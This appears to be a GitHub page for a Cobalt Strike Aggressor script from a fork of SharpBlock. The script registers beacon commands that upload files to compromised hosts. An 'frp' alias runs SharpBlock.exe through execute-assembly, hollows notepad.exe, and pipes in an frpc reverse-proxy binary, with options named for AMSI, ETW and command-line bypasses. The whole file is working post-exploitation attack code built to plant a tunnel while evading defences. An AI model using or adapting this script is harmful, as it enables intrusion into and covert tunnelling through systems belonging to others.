forked from CCob/SharpBlock
-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathupload.cna
34 lines (25 loc) · 923 Bytes
/
upload.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
beacon_command_register("upload_file", "Uploads a local file and send to a file accessible by the beacon host (including pipes)", "upload_pipe");
sub _upload_file{
$handle = openf($2);
$data = readb($handle, -1);
closef($handle);
bupload_raw($1, $3, $data);
}
alias upload_file {
_upload_file($1, $2, $3);
}
alias frp {
local('$bid');
$bid = $1;
bexecute_assembly($bid,script_resource("SharpBlock.exe"),"-e \\\\.\\pipe\\pipename -s c:\\windows\\system32\\notepad.exe --disable-bypass-cmdline --disable-bypass-amsi --disable-bypass-etw");
$handle = openf(script_resource("frpc_windows_x64.exe"));
$data = readb($handle,-1);
closef($handle);
bupload_raw($bid,"\\\\.\\pipe\\pipename",base64_encode($data));
# This code turn off Pipeserver
for ($total = 0; $total < 5; $total++)
{
bpause($bid,100);
bupload_raw($bid,"\\\\.\\pipe\\pipename","ok");
}
}